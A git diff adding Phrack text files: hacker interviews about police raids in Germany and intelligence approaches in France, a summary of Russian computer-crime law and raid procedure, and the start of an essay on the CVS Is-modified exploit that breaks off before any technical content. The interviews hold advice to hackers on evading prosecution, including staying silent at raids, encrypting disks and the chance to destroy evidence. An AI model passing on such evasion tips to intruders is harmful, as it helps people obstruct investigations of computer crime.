+Another thing about the raid: they did ring normally, nothing with
+bashing the door. if my mother hadnt opened the door, i had enough time
+to destroy things. but unluckly, as most germans, she did open the door
+when she heard the word "police" hehe.
+
+I didnt not have a trial, i accepted a "order of summary punishment" this
+is the technical term i looked up in the dictonary :-) This is something
+that a judge decides after he has all information. he can open a trial
+or use this order of summary punishment. they mail it you you, and if
+you dont say "no, i deny" within one week, you accpeted it :-) When you
+deny it, THEN you definitly decide to go to court and have a trial .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: do you advise hackers to accept
+it ?
+
+You cant generally give an advice about that. in my case, i found it
+important that i do not have any crime record at all and that i count
+as "first offender" if i ever have a trial in the future. so with that
+accpetion of the summary, i knew what i get, which was acceptable for
+my case.  if you go to court, you can never know if the fine will be
+much higher. but you cant generalize it.  if its below "90 tagessaetze"
+(--> over 90 you get a crime recoard), i guess i would accept it, but
+again, better go to a lawyer of your trust :-)
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare LKA with an
+american and/or european organisation ? What is their activity if their
+are not skilled with computers ?
+
+Mmmm every country within germany has its special department called LKA.
+Its not like the FBI (that would be BKA), but it would be like a state
+in the usa, say florida, has a police department for whole florida
+which does all the special stuff, like organzied crime. Computer crime
+in germany belongs to economic crime, and therefore, the normal police
+isnt the correct department, but the LKA. By the way, I heard from
+different people that they are more skilled now. but at that time, I
+think only one person had an idea about UNIX at all. I know that the BKA
+has a special department for computer crime, because a friend of mine got
+visited by the BKA, but, most computer crime departments here are against
+child-porn. I dont think that too many people get busted for hacking in
+germany at all. they do bust child porn, they do bust warez guys, they
+do bust computer fraud, related to telco-crimes. but hacking, I dont
+know lots of people who had problems for real hacking. except one guy .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: is there special services in your
+country who are involved in hacking ?
+
+Special services ? what do you mean? like CIA ? hehe ?! We have
+BND (counter-spying), MAD (military spying), verfassungsschutz
+(inland-spying), but I dont think we a service that is concentrating
+on computer crime. What we do have is a lot of NSA (echelon) stations
+from the US. I guess because of the cold war, we're still pretty much
+under the supervision of these services :-) so the answer is: we dont
+have such services, or they do work so secret that noone knows, but i
+doubt this in germany hehe.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Except for the crime they inculped
+you, did you have any relations with the police ? (phone calls, non
+related interview, job proposition) ?
+
+Hehe, no, not at all.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information was
+the police asking you during your interview ? Were they asking non
+crime-related information ?  (like: who are you chilling with, etc ?)
+
+Yeah, that was the part they where most interested in ! They had
+printed my /etc/passwd and said "thats your nick, right?" . I didnt say
+anything to that whole complex, but they continued, and I mean, if you
+have one user in your /etc/passwd, it is pretty easy to guess thats
+your nick. So, they had searched the net for that nick, they found a
+page maintained by some hackers who formed some kind of crew. they had
+printed the whole website of that crew, pointing out my name anywhere
+where it appeared. They tried to play the good-cop game, the "you're that
+cool dude there eh?" etc. I didnt say anything again. It took several
+minutes, and they wanted to pin-point me that i'm using this nick they
+found in /etc/passwd and that i am a member of that group which they
+had the webpage printed. They knew that there was a 2nd hacker at that
+university. They asked me all the time if i know him.  I dont know why
+he had more luck. of course i did know him, it was my mate with whom i
+did lots of the stuff together.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: You didnt say anything ? How did
+they accepted this ?
+
+hehe. they had to accept it. i think thats in most countries that, if
+you are accused, you have the right to say nothing. I played an easy
+game: I accepted to have copied the 9 cd's. because the cd's are prove
+enough at all, then the cops where happy. I didnt say anything to that
+hacking complex, which was way more interesting for them. I though "I
+have to give them something, if I dont want to go before court" . I said
+"I did copy that windows cd" so they have at least something.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: did you feel some kind of evolution
+in your relation with police ? Did they try to be friend with you at
+some point ?
+
+yeah, they did try to be friend at several stages.
+
+a) At the raid. my parents where REALLY not amuzed, i think you can
+imagine that. having policemen sneaking through your cloth, your bedroom,
+etc. So, they noticed my mom was pretty much nervous and "at the end"
+. They said "make it easy for your mother, be honest, be a nice guy,
+its the first time, tell us something ..." (due to my starting law
+school at that time, I, of course knew that its the best thing to stay
+calm and say nothing.)
+
+b) At the questioning, of course. after I admitted the warez stuff,
+they felt pretty good, which was my intention. they allowed me to smoke,
+and stuff like that. when it came to hacking, and i didnt say anything,
+They continued to be "my friend", and tried to convince me "thats its
+easier and better if i admit it, because eveidence is so high" . They
+where friendly all the time, yeah.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they were really
+knowing ?
+
+They definitly knew I used unauthorized dial-in accounts at that
+university, they knew I was using that nick, and that I am a member of
+that hacking group (nothing illegal about that, though) . I was afraid
+that they might know my real activities, because, again, that university
+was JUST my starting point, so all i did was using accounts i shouldnt
+use. Thats no big deal at all, dial-ins. but i didnt know what they knew
+about the real activities after the dial-in, so i was afraid that they
+know more about this.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: did they know personnal things
+about the other people in your hacking group ?
+
+nope, not at all.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: How skilled are the forensics
+employed by german police in 2002 ?
+
+huh, i luckly dont know. I read that they do have some forensic
+experts at the BKA, but the usually busting LKA isnt very skilled, in my
+opinion. they have too less people to cover all the computer crimes. they
+work on low money with old equipment. and they use much of their time
+to go after kiddie-porn.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: how does the police perceived
+your group ?  (front-side german hacking group you guyz all know)
+
+I think they thought we're a big active crew which does hacking, hacking
+and hacking all the time. i guess they wanted to find out if we e arn
+money with that, e.g., of if we're into big illegal activities. because
+of course, it might be illegal just to be a member of an illegal group.
+like organzied crime.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: in the other hand, what do you
+think the other hacking crew think about your group ?
+
+We and other hackers saw us as group which shares knowledge, exchange
+security related informations, have nice meetings, find security problems
+and write software to exploit that problems. I definitly did not see us
+as organzied hacking group which earns money, steal stuff or make other
+people loose money, but, I mean, you cant know what a group really does
+just from visiting a webpage and looking at some papers or tools.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ?
+
+yeah, troubles are completely over now. i got a fine, 75 german marks
+per cd, so i had to pay around 800 german marks. I am not previously
+convicted, no crime record at all. no civil action.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Now that troubles are over, do you
+have some advices for hackers in your country, to avoid beeing busted,
+or to avoid having troubles like you did ?
+
+hehe yeah, in short words:
+
+a) Always crypt your ENTIRE harddisk
+
+b) Do NOT own any, i repeat, any illegal warez cd. reason: any judge
+knows illegal copied cds. he understands that. so, like in my case,
+you get accused for hacking and you end up with a fine for illegal
+warez. Thats definitly not necessary. and, furthermore, you get your
+computer stuff back MUCH easier & faster if you dont have any warez
+cd. usually, they cant prove your hacking. but warez cd's are easy.
+
+c) do not tell ANYTHING at the raid.
+
+d) if you are really into trouble, go to a lawyer after the raid.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> Thanks for the interview WILLY !
+
+De nada, you are welcomed ;)
+
+
+
+                       ------------------------------------------
+
+                                    Zac's interview
+
+
+
+<THE CIRCLE OF LOST HACKERS> Hello Zac, nice to meet you .
+
+Hi new staff, how's life ?
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of
+relationship you're (as a hacker) having with the police in your country ?
+
+I live in France, as a hacker I never had troubles with justice .  In my
+country, you can have troubles in case you are a stupid script kiddy (most
+of the time), or if you disturb (even very little) intelligence services
+. Actually we have very present special services inside the territory,
+whereas the police itself is too dumb to understand anything about
+computers . Some special non-technical group called BEFTI usually deals
+with big warezers, dumb carders, or people breaking into businesses's
+PABX and doing free calls from there, and stuffs like that .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> Explain to us how you got into hacking,
+since when you are involved in the scene, and when you started to play
+with TCP/IP networks .
+
+I started quite late in the 90' when I met friends who were doing warez
+and trying to start with hacking and phreaking . I have only a few years
+of experience on the net, but I learnt quite fast beeing always behind
+the screen, and now I know a lot of people, all around the world, on
+IRC and IRL .
+
+Beside this, I had my first computer 15 years ago, owned many INTEL based
+computers, from 286 to Pentium II . I have now access to various hardware
+and use these ressources to do code . I used to share my work with other
+(both whitehats and blackhats) peoples, I dont hide myself particulary
+and I am not involved in any kind of dangerous illegal activity .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: When did you get into troubles
+for the first time ?
+
+Last year (2001), when DST ('Direction de la Surveillance du Territoire',
+french inside-territory intelligence services) contacted me and asked if
+I was still looking for a job . I said yes and accepted to meet them .
+I didnt know it was DST at that time, but I catched them using google ;)
+They first introduced themself from 'Ministere de l'Interieur', which is
+basicaly Ministery charged of police coordination and inside-territory
+intelligence services . In another later interview, they told me they
+were DST, I'll call them 'the feds' .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ?
+
+I still have no idea, I guess someone around me taught them about me
+. When I asked, they told me it was from one of the various (very few)
+businesses I had contacted at that time . Take care when you give your
+CV or anything, keep it encrypted when it travels on the net, because
+they probably sniff a lot of traffic . I also advise to mark it in a
+different way each time you give it, so that you can know from where it
+leaked using SE at the feds .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the
+organization ?
+
+Some information about them has already been disclosed in french
+electronic fanzines like Core-Dump (92') and NoWay (94'), both written
+by NeurAlien . I heard he got mad problem because of this, I dont really
+want to experiment the same stuff .
+
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: is there other special services
+in your country who are involved in hacking ?
+
+Besides DST, there is DGSE ('Direction General de la Securite Exterieur'),
+these guys most focuss on spying, military training, and information
+gathering outside the territory . There is also RG ('Renseignement
+generaux', trans. : General Information) , a special part of police
+which is used to gather various information about every sensible events
+happening . The rumor says there's always 1 RG in each public conference,
+meeting, etc and its not very difficult to believe .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare the organization
+with an equivalent one in another country ?
+
+Their tasks is similar to CIA's and NSA's one I guess . DST and DGSE
+used to deal with terrorists and big drugs trafic networks also, they
+do not target hackers specifically, their task is much larger since they
+are the governemental intelligence services in France .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> Is DST skilled with computers ?
+
+They -seem- quite skilled (not too much, but probably enough to bust a
+lot of hackers and keep them on tape if necessary) . They also used to
+recruite people in order to experiment all the new hacking techniques
+(wireless, etc) .
+
+However, I feel like their first job is learning information, all
+the technical stuff looks like a hook to me . Moreover, they pay very
+bad, they'll argue that having their name on your CV will increase your
+chances to get high payed jobs in the future . Think twice before signing,
+this kind of person has very converging tendances to lie .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information did they
+ask during the interviews ?
+
+The first time, it was 2 hours long, and there was 2 guyz . One was
+obviously understanding a bit about hacking (talking about protocols,
+reverse engineering, he assimilated the vocabulary as least), the other
+one wasnt doing the difference between an exploit and a rootkit, and
+was probably the 'nice fed around' .
+
+They asked everything about myself (origin, family, etc), one always
+taking notes, both asking questions, trying to appear like interrested
+in my life . They asked everything from the start to the end . They
+asked if the official activity I have right now wasnt too boring,
+who were the guy I was working with, in what kind of activity I was
+involved, and the nature of my personnal work . They also asked me if I
+was aware of 0day vulnerabilities into widely-used software . I knew I
+add not to tell them anything, and try to get as much information about
+them during the interview . You can definitely grab some if you ask them
+questions .  Usually, they will tell you 'Here I am asking the questions',
+but sometimes if you are smart, you can guess from where they got the
+information, what are their real technical skills level, etc .
+
+At the end of the interview, they'll ask what they want to know if you
+didnt tell them . They can ask about groups they think you are friend
+with, etc .  If you just tell them what is obviously known (like,
+'oh yeah I heard about them, its a crew interrested in security, but
+I'm not in that group') and nothing else, its ok .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they were really
+knowing ?
+
+I guess they are quite smart, because they know a lot of stuff, and
+ask everything as if they were not knowing anything . This way, they
+can spot if you are lying or not .  Also, if you tell them stuffs you
+judge irrevelant, they will probably use it during other interviews,
+in order to guess who you are linked to .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ?
+
+I hope they will let me where I am, anyway I wont work for them, I
+taught a few friends of mine about it and they agreed with me . Their
+mind changes over time and government, I highly advise -NOT- to work
+for them unless you know EXACTLY what you are doing (you are a double
+agent or something lol) .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> do you have some advices for hackers in
+your country, to avoid beeing busted, or to avoid having troubles ?
+
+Dont have a website, dont release shits, dont write articles, dont do
+conference, dont have a job in the sec. industry . In short : it's very
+hard . If they are interrested in the stuffs you do and hear about it,
+they'll have to meet you one day or another . They will probably just
+ask more about what you are doing, even if they have nothing against
+you . Dont forget you have the right to refuse an interview and refuse
+answering questions . I do not recommand to lie to them, because they
+will guess it easily (dont forget information leakage is their job) .
+
+I advise all the hackers to talk more about feds in their respective
+groups because it helps not beeing fucked . Usually they will tell
+you before leaving 'Dont forget, all of this is CONFIDENTIAL', it is
+just their way to tell you 'Okay, thanks, see you next time !' . Dont
+be impressed, dont spread information on the net about a particular guy
+(targetted hacker, or fed), you'll obviously have troubles because of it,
+and its definitely not the good way to hope better deals with feds in
+the future . To FEDS: do not threat hackers and dont put them in jail,
+we are not terrorists . Dont forget, we talk about you to each other,
+and jailing one of us is like jailing all of us .
+
+
+<THE CIRCLE OF LOST HACKERS> Thanks zac =)
+
+At your service, later .
+
+
+                       ------------------------------------------
+
+                                 Big Brother does Russia
+                                           by
+                                      ALiEN Assault
+
+
+
+This  file  is  a basic description of russian computer law related
+issues.  Part  1  contains  information  gathered  primarily  from
+open sources. As this sources  are  all  russian, information may be
+unknown to those who doesn't know russian language. Part  2  consists
+of  instructions  on  computer crime investigation: raid guidelines and
+suspect's system exploration.
+
+
+0 - DISCLAIMER 1 - LAW
+  1.1 - Basic Picture 1.2 - Criminal Code 1.3 - Federal Laws
+2 - ORDER
+  2.1 - Tactics of Raid 2.2 - Examining a Working Computer 2.3 -
+  Expertise Assignment
+
+
+--[ 0.DISCLAIMER.
+
+INFORMATION PROVIDED FOR EDUCATIONAL PURPOSES ONLY. IT MAY BE ILLEGAL
+IN YOUR COUNTRY TO BUST HACKERS. IT MUST BE ILLEGAL AT ALL. THERE ARE
+BETTER THINGS TO DO. EXPLORE YOURSELF AND THIS WORLD. SMILE. LIVE.
+
+
+--[ 1.	 LAW.
+
+----[ 1.1. Basic Picture.
+
+Computer-related  laws	are  very  draft and poorly describes what are
+ones about.  Seems  that  these  are  simply  rewritten instructions
+from 60's *Power Computers* that took a truck to transport.
+
+Common	subjects  of lawsuits include carding, phone piracy (mass
+LD service thievery)  and...  hold  your  breath... virii infected
+warez trade. Russia is a real  warez  heaven  -  you can go to about
+every media shop and see lots of CDs with  warez,  and some even has
+"CRACKS AND SERIALS USAGE INSTRUCTIONS INCLUDED" written  on  front
+cover  (along with "ALL RIGHTS RESERVED" on back)! To honour pirates,
+they  include  all  .nfo  files  (sometimes  from  4-5 BBSes warez was
+courriered  through).  It  is  illegal	but  not  prosecuted.  Only if
+warez are infected  (and  some VIP bought them and messed his system up)
+shop owners faces legal  problems.
+
+Hacking  is  *not  that  common*,  as  cops are rather dumb and busts
+mostly script kiddies for hacking their ISPs from home or sending your
+everyday trojans by email.
+
+There  are  three  main  organisations	dealing  with  hi-tech	crime:
+FAPSI (Federal	Government  Communications  and  Information  Agency
+- mix of FCC and secret service), UKIB FSB (hi-tech feds; stands for
+departamernt of computer and information  security)  and  UPBSWT  MVD
+(hi-tech  crime fightback dept.) which incorporates R unit (R for radio -
+busts ham pirates and phreaks).
+
+FSB   (secret	service)  also	runs  NIIT  (IT  research  institute).
+This organisation  deals  with	encryption  (reading your PGPed mail),
+examination of malicious  programs  (revealing	Windoze source) and
+restoration of damaged data (HEXediting saved games). NIIT is believed
+to possess all seized systems so they have tools to do the job.
+
+UPBSWT	has a set of special operations called SORM (operative
+and detective measures	system).  Media describes this as an
+Echelon/Carnivore-like thing, but it  also monitors phones and
+pagers. Cops claims that SORM is active only during major criminal
+investigations.
+
+
+----[ 1.2. Criminal Code.
+
+Computer criminals are prosecuted according to this articles of the Code:
+
+- 159:	Felony. This mostly what carders have to do with, accompanied by
+	caught-in-the-act  social  engineers.  Punishment  varies
+	from fine (minor, no criminal record) to 10 years prison term
+	(organized and repeated crime).
+
+- 272:	Unauthorized access to computer information. Easy case will end
+up in
+	fine  or up to 2 years probation term, while organized, repeated
+	or involving "a person with access to a computer, computer complex
+	or network" (!#$@!) crime may lead  to	5  years  imprisonment.
+	Added to  this are weird comments on what are information,
+	intrusion and information access.
+
+- 273:	Production, spreading and use of harmful computer
+programs. Sending
+	trojans  by  mail considered to be lame and punished by up to 3
+	years in prison. Part II says that "same deeds *carelessly* caused
+	hard consequences" will result in from 3 to 7 years in jail.
+
+- 274:	Computer, computer complex or network usage rules breach. This
+one is
+	tough  shit.  In  present,  raw  and  somewhat	confused
+	state this looks, say, *incorrect*.  It  needs that at least
+	technically literate person should provide correct and clear
+	definitions. After that clearances this could be useful thing:
+	if  someone  gets  into  a  poorly  protected  system,	admin will
+	have to take responsibility too. Punisment  ranges  from ceasing
+	of right to occupy "defined" (defined  where?) job positions to
+	2 years prison term (or 4 if something fucked up too seriously).
+
+
+----[ 1.3. Federal Law.
+
+Most notable subject related laws are:
+
+"On  Information,  Informatization  and Information Security"
+(20.02.95). 5 chapters	of  this  law  defines	/*  usually not
+correct or even intelligent */ various	aspects  of  information  and
+related issues. Nothing really special or important  -	civil rights
+(nonexistent), other crap, but still having publicity (due  to	weird
+and easy-to-remember name i suppose) and about every journalist covering
+ITsec pastes this name into his article for serious look maybe.
+
+"National  Information Security Doctrine" (9.9.2K) is far more
+interesting.  It  will tell you how dangerous Information Superhighway
+is, and this isn't your average  mass-media  horror  story  -  it's
+a  real thing! Reader will know how hostile  foreign  governments  are
+busy  imlpementing  some  k-rad mind control tekne3q  to  gain r00t on
+your consciousness; undercover groups around the globe are  engaging in
+obscure infowarfare; unnamed but almighty worldwide forces also about
+to control information...ARRGGH! PHEAR!!!
+
+{ALiEN special note: That's completely true. You suck Terrans. We'll
+own your planet soon and give all of you a nice heavy industry job}.
+
+Liberal values are covered too (message is BUY RUSSIAN). Also there are
+some definitions (partly correct) on ITsec issues.
+
+"On  Federal  Government  Communications and Information" (19.2.93,
+patched 24.12.93  and  7.11.2K).  Oh yes, this one is serious. Everyone
+is serious about his  own  communications - what can i say? Main message
+is "RESPONSIBLES WILL BE FOUND. OTHERS KEEP ASIDE".
+
+Interesting  entity defined here is Cryptographic Human Resource -
+a special unit	of  high qualified crypto professionals which must be
+founded by FAPSI. To be  in  Cryptographic  Human  Resource  is to serve
+wherever you have retired or anything.
+
+Also  covered  are rights of government communications personnel. They
+have no  right	to  engage  in	or to support strike. Basically they have
+no right to fight  for	rights.  They  don't  have  a right to publish or
+to tell mass-media anything about their job without previous censorship
+by upper level management.
+
+Cryptography   issues	are  covered  in  "On  Information  Security
+Tools Certification"  (26.6.95 patched 23.4.96 and 29.3.99) and "On
+Electronic Digital Signature"  (10.2.02).  Not	much  to  say about. Both
+mostly consists of strong definitions of certification procedures.
+
+
+--[ 2. ORDER.
+
+----[ 2.1. Tactics of Raid.
+
+Given information is necessary for succesful raid. Tactics of raid
+strongly depends on previously obtained information.
+
+It  is	necessary to define time for raid and measures needed to conduct
+it suddenly  and  confidentially. In case of presence of information
+that suspect's computer  contains  criminal  evidence  data,  it  is
+better to begin raid when possibility that suspect is working on that
+computer is minimal.
+
+Consult  with  specialists  to	define what information could be stored
+in a computer  and  have  adequate technics prepared to copy that
+information. Define all  measures to prevent criminals from destroying
+evidence. Find raid witnesses who  are	familiar  with	computers
+(basic	operations, programs names etc.) to exclude  possibility of
+posing raid results as erroneous at court. Specifity and complexity
+of  manipulations  with  computer  technics  cannot be understood
+by illiterate,	so  this  may  destroy	investigator's efforts on
+strengthening the value of evidence.
+
+Witness' misunderstanding of what goes on may make court discard evidence.
+Depending  on  suspect's  qualification  and  professional  skills,
+define a computer technics professional to involve in investigation.
+
+On arrival at the raid point is necessary to: enter fast and sudden
+to drive computer stored information destruction possibility  to  the
+minimum. When possible and reasonable, raid point power supply must be
+turned off.
+
+Don't allow no one touch a working computer, floppy disks, turn computers
+on and off; if necessary, remove raid personnel from the raid point;
+don't allow no one turn power supply on and off; if the power supply
+was  turned  off at the beginning of raid, it is necessary to unplug all
+computers and peripherals before turning power supply on; don't manipulate
+computer technics in any manner that could provide inpredictable results.
+
+After  all  above  encountered	measures  were	taken,	it  is necessary
+to preexamine  computer technics to define what programs are working
+at the moment.	If   data  destruction	program  is  discovered  active
+it  should  be	stopped immediately  and examination begins with exactly
+this computer. If computers are connected  to  local  network,	it  is
+reasonable to examine server first, then working computers, then other
+computer technics and power sources.
+
+
+----[ 2.2. Examining a Working Computer.
+
+During the examination of a working computer is necessary to:
+
+- define what program is currently executing. This must be done by
+examining
+  the  screen  image  that  must  be  described  in detail in raid
+  protocol. While necessary, it should be photographed or videotaped. Stop
+  running program and fix results of this action in protocol, describing
+  changes occured on computer screen;
+
+- define presence of external storage devices: a hard drive (a
+winchester*),
+  floppy  and ZIP type drives, presence of a virtual drive (a temporary
+  disc which is  being	created  on  computer  startup	for increasing
+  performance speed) and describe  this  data  in  a  protocol	of raid;
+
+
+- define presence of remote system access  devices  and  also  the
+current state of
+  ones (local network connection, modem  presence),  after  what
+  disconnect  the computer  and modem, describing results of that in
+  a protocol;
+
+- copy programs and files from the virtual drive (if present) to the
+floppy disk or to
+  a separate directory of a hard disk;
+
+- turn the computer off and continue with examining it. During this is
+necessary to
+  describe  in	a  raid protocol and appended scheme the location
+  of computer and  peripheral  devices (printer, modem, keyboard,
+  monitor etc.) the purpose of every  device,  name,  serial  number,
+  configuration (presence and type of disk drives,  network  cards,
+  slots etc.), presence of connection to local computing network  and
+  (or) telecommunication networks, state of devices (are there tails
+  of opening);
+
+- accurately  describe the order of mentioned devices interconnection,
+marking
+  (if necessary) connector cables and plug ports, and disconnect computer
+  devices.
+
+- Define, with the help from specialist,  presence  of	nonstandard
+apparatus inside
+  the computer, absence of microschemes, disabling of an inner power
+  source (an accumulator);
+
+- pack (describing location where were found in a protocol) storage
+disks and
+  tapes.  Package  may	be special diskette tray and also common paper
+  and plastic bags, excluding ones not preventing the dust (pollutions
+  etc.) contact with disk or tape surface;
+
+- pack	every  computer  device  and  connector  cable.  To  prevent
+unwanted
+  individuals' access, it is necessary to place stamps on system block -
+  stick the power  button  and	power  plug slot with adhesive tape and
+  stick the front and side panels mounting details (screws etc.) too.
+
+
+If it is necessary to turn computer back on during examination, startup
+is performed with a prepared boot diskette, preventing user programs
+from start.
+
+* winchester - obsolete mainstream tech speak for a hard drive. Seems to
+be of western origin but i never met this term in western sources. Common
+shortage is "wint".
+
+
+----[ 2.3. Expertise Assignment.
+
+
+Expertise  assignment  is an important investigation measure for such
+cases.	General  and  most  important  part  of  such  an expertise is
+technical program (computer technics) expertise. MVD (*) divisions have
+no experts conducting such expertises  at  the	current  time,	so  it
+is possible to conduct such type of expertises	at  FAPSI  divisions
+or to involve adequately qualified specialists from other organisations.
+
+Technical program expertise is to find answers on following:
+
+- what information contains floppy disks and system blocks presented to
+  expertise?
+
+- What is its purpose and possible use?
+
+- What programs contains floppy disks and system blocks presented to
+  expertise?
+
+- What is their purpose and possible use?
+
+- Are there any text files on floppy disks and system blocks presented to
+  expertise?
+
+- If so, what is their content and possible use?
+
+- Is there destroyed information on floppy disks presented to expertise?
+
+- If so, is it possible to recover that information?
+
+- What is that information and what is its possible use?
+
+- What program products contains floppy disks presented to expertise?
+
+- What are they content, purpose and possible use?
+
+- Are  between	those  programs  ones  customized  for	passwords
+guessing or
+  otherwise  gaining  an  unauthorized	computer  networks access?
+
+- If so, what are their  names,  work  specifications, possibilities of
+usage to
+  penetrate defined computer  network?
+
+- Are there evidence of defined program usage to penetrate the
+abovementioned network?
+
+- If so, what is that evidence?
+
+- What is chronological sequence of actions necessary to start defined
+program
+  or to conduct defined operation?
+
+- Is it possible to modify program files while working in a given
+computer network?
+
+- If so, what modifications can be done, how can they be done and from
+what computer?
+
+- Is it possible to gain access to confidential information through
+mentioned network?
+
+- How such access is being gained?
+
+- How  criminal  penetration  of  the  defined	local  computer
+network  was
+  committed?
+
+- What	is  the  evidence  of  such  penetration?
+
+- If this penetration involved	remote access, what are the possibilites
+of identifying an
+  originating computer?
+
+- If an evidence of a remote user intrusion is absent, is it possible
+to point computers from
+  which such operations can be done?
+
+
+Questions may be asked about compatibility of this or that programs;
+possibilities of running a program on defined computer etc. Along with
+these, experts can be asked on purpose of this or that device related
+to computer technics:
+
+- what is the purpose of a given device, possible use?
+
+- What is special with its construction?
+
+- What parts does it consist of?
+
+- Is it industrial or a homemade product?
+
+- If it is a homemade device, what kind of knowledge and in what kind of
+  science and technology do its maker possess, what is his professional
+  skill level?
+
+- With what other devices could this device be used together?
+
+- What are technical specifications of a given device?
+
+
+Given methodic recommendments are far from complete list of questions
+that could be asked in such investigations but still does reflect the
+important aspects of such type of criminal investigation.
+
+
+* MVD (Ministry of Inner Affairs) - Russian police force.
+
+
+CREDITS
+
+     I like to mention stiss and BhS group for contibutions to this file.
diff --git a/phrack64/15.txt b/phrack64/15.txt
new file mode 100644
index 0000000..ace7713
--- /dev/null
+++ b/phrack64/15.txt
@@ -0,0 +1,678 @@
+             _                                                _
+            _/B\_                                            _/W\_ 
+            (* *)            Phrack #64 file 14              (* *) 
+            | - |                                            | - | 
+            |   |          The art of Exploitation:          |   |
+            |   |                                            |   |
+            |   |           Come back on a exploit           |   | 
+            |   |                                            |   |
+            |   |         by vl4d1m1r of Ac1dB1tch3z         |   |
+            (____________________________________________________)
+
+
+
+Dear Underground, starting from this release, the Circle of Lost Hackers
+decided to publish in each release a come back on a public exploit known
+from a long time. This section could be called 'autopsy of an exploit'.
+
+The idea is to explain the technical part of a famous exploit as well
+as its story, post-mortem.  Here we start with the CVS "Is-modified"
+exploit who leaked in 2004.
+
+                          -------------------
+                                PRELUDE
+                         Exploitation is an art.
+
+Coding an exploit can be an art form in itself. To code a true exploit,
+you need the total control on the system. To achieve this feat, we usually
+need to understand, analyze and master every pieces of the puzzle. Nothing
+is left to chance.  The art of exploitation is to make the exploit
+targetless, ultimately oneshot. To go further the simple pragmatic
+exploitation.  Make it more than a simple proof of concept shit. Put
+all your guts in it.  Try to bypass existing protection techniques.
+
+A nice exploit is a great artwork, but confined to stay in the shadow.
+The inner working are only known by its authors and the rare code readers
+searching to pierce its mysteries.  Its for the latter ones that this
+section was created. For the ones who are hungry about the information
+that hides behind the source code.
+
+This is the only reason behind the "r34d 7h3 c0d3 d00d" of the usage()
+function in this exploit : to force people to read the code, appreciate
+what you have in hand.  Not to provide them a new tools or a new weapons
+but make them understand the various technical aspects of it.
+
+Each exploit is built following a particular methodology.  We need to
+deeply analyze all the possibilities of the memory allocations until we
+master all of its parameters, often to a point where even the original
+programmers were ignoring these technical aspects.  It is about venturing
+yourselves in the twists and turns, the complexity of the situation and
+finally discovering all the various opportunities that are available to
+you. To see what the fate has to offer us, the various potentials at our
+disposal. To make something out of it. Try to take out the best from
+the situation.  When you'll get through this invisible line, the line
+that separates the simple proof of concept code from the best exploit
+possible, the one that guarantees you a shell every time, you could
+then say that the creation of an art form has just begun.  The joy of
+gazing at your own piece of work leveraging a simple memory overwrite
+to a full workable exploit. It is a technical jewel of creativity and
+determination to bring a small computer bug to its full potential.
+
+Who has never rooted a server with the exploit 'x2'?  Who never waited
+in front of his screen, watching the different steps, waiting for it to
+realize the great work it was made for ?  But, how many people really
+understood the dichotomies of 'x2' and how it worked ? What was really
+happening behind what was printed on the screen, in this unfinished
+version of the exploit that got leaked and abused?
+
+Beyond the pragmatic kiddie who wants to get an access, this section
+aims at being the home for those who are motivated by curiosity, by
+the artistic sensibility at such exploits.  This section is not meant
+to learn others how to own a server, but instead to teach them how the
+exploit is working. It is a demystification of the few exploits that
+leaked in the past of the underground to become in the public domain. It
+is about exploits that have been over exploited by a mass of incompetent
+people. This section is for people who can see, not for people who are
+only good at fetching what really have value.
+
+In fact, this section is about making justice to the original exploit.
+It is a return on what really deserves attention. At a certain point
+in time, the required level of comprehension to achieve a successful
+exploitation reaches the edge of insanity. The spirit melts with madness,
+we temporarily loose all kind of rationality and we enter a state of
+illumination.
+
+It's the fanaticism of the passionate that brings this to its full extent,
+at his extreme, demonstrate that it's possible to transcend the well
+known, to prove we can always achieve more, It is about pushing the
+limits. And then we enter the artistic creation,
+
+No, we are not moving away, but we are instead getting closer to the
+reality that hides behind an exploit. Only a couple of real exploits
+have been made public. The authors of them are generally smart enough
+to keep them private. Despite this, leaks happen for various reasons
+and generally it's a beginner error.
+
+The real exploit is not the one that has 34 targets, but only one, namely
+all at the same time. An exploit that takes a simple heap overflow and
+makes it work against GRsec, remotely and with ET_DYN on the binary. You
+will probably use this exploit only once in your whole life, but the
+most important part is the work accomplished by the authors to create it.
+The important part is the love they put in creating it.
+
+Maybe you'll learn nothing new from this exploit. In fact, the real
+goal is not to give you new exploitation techniques. You are grown up
+enough to read manuals, find your own techniques, make something out of the
+possibilities offered to you, the goal is to simply give back some praise
+to this arcane of obscured code forsaken from most of the people, this
+pieces of code which have been disclosed but still stay misunderstood.
+
+A column with the underground spirit, the real, for the expert and the
+lover of art.  For the one who can see.
+
+                   -----------------------------------
+
+                       The CVS "Is_Modified" exploit
+
+                           vl4d1m1r of ac1db1tch3z
+
+                               vd@phrack.org
+
+
+1 - Overview
+
+2 - The story of the exploit
+
+3 - The Linux exploitation: Using malloc voodoo
+
+4 - A couple of words on the BSD exploitation
+
+5 - Conclusion
+
+
+
+--[ 1 - Overview
